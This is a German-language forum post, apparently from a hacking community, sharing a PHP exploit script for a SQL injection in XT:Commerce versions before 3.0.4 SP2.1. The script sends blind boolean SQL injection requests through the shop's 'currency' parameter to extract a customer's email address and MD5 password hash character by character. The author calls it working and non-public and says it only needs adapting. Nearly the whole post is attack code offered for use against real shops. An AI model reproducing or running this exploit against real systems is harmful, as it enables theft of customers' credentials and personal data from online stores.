Dieser Exploit war nonpub ... die Sicherheitslücke wurde von XT Commerce erst sehr spät endeckt ,
Und ich kenne bis jetzt keinen Public gewordenen Exploit. Also ist meiner quasi noch nonpub...
der code ist kein vorschaucode ...
greez ins0
[HIDE]
PHP
- #!/usr/bin/php -q
- <?php
- /*************************************************************************
- * XT:Commerce < v3.0.4 SP2.1 Currency.Class SQL Injection Vulnerability *
- * 2008 //ins0.! - 0-day development *
- *************************************************************************/
- $alpha_low = array( '.',
- '@',
- 'a',
- 'b',
- 'c',
- 'd',
- 'e',
- 'f',
- 'g',
- 'h',
- 'i',
- 'j',
- 'k',
- 'l',
- 'm',
- 'n',
- 'o',
- 'p',
- 'q',
- 'r',
- 's',
- 't',
- 'u',
- 'v',
- 'w',
- 'x',
- 'y',
- 'z');
- $numbers = array( '0',
- '1',
- '2',
- '3',
- '4',
- '5',
- '6',
- '7',
- '8',
- '9');
- $correct_chars = '';
- $md5_string = '';
- for($x = 0; $x < count($alpha_low); $x++){
- $char_string = $correct_chars.ord($alpha_low[$x]).',';
- $query_string = "http://www.shopyurl.com/?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_email_address+LIKE+CHAR(".$char_string."37))/*&manufacturers_id='";
- $source = file_get_contents($query_string);
- if(preg_match('#EUR#iU', $source) == 0){
- $correct_chars .= ord($alpha_low[$x]).',';
- $md5_string .= $alpha_low[$x];
- echo ">>>>> FOUND -> '".$alpha_low[$x]."' MD5 = ".$md5_string."\r\n\r\n\r\n";
- $x = -1;
- continue;
- }else{
- echo '\''.$alpha_low[$x].'\' => '.preg_match('#EUR#iU', $source)."\r\n";
- }
- if($x == 27){
- for($y = 0; $y < count($numbers); $y++){
- $char_string = $correct_chars.ord($numbers[$y]).',';
- $query_string = "http://www.shopyurl.com/?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_password+LIKE+CHAR(".$char_string."37))/*&manufacturers_id='&date=".time();
- $source = file_get_contents($query_string);
- if(preg_match('#EUR#iU', $source) == 0){
- $correct_chars .= ord($numbers[$y]).',';
- $md5_string .= $numbers[$y];
- echo ">>>>> FOUND -> '".$numbers[$y]."' MD5 = ".$md5_string."\r\n\r\n\r\n";
- $y = 15;
- }else{
- echo '\''.$numbers[$y].'\' => '.preg_match('#EUR#iU', $source)."\r\n";
- }
- }
- $x = -1;
- }
- }
- echo "\r\n\r\n\r\n";
- echo ">>>> Break! MD5: => ".$md5_string."\r\n";
- ?>
[/HIDE]
Der Code ist funktionstüchig und für PW + Email geeignet jedoch muss er angepasst werden.#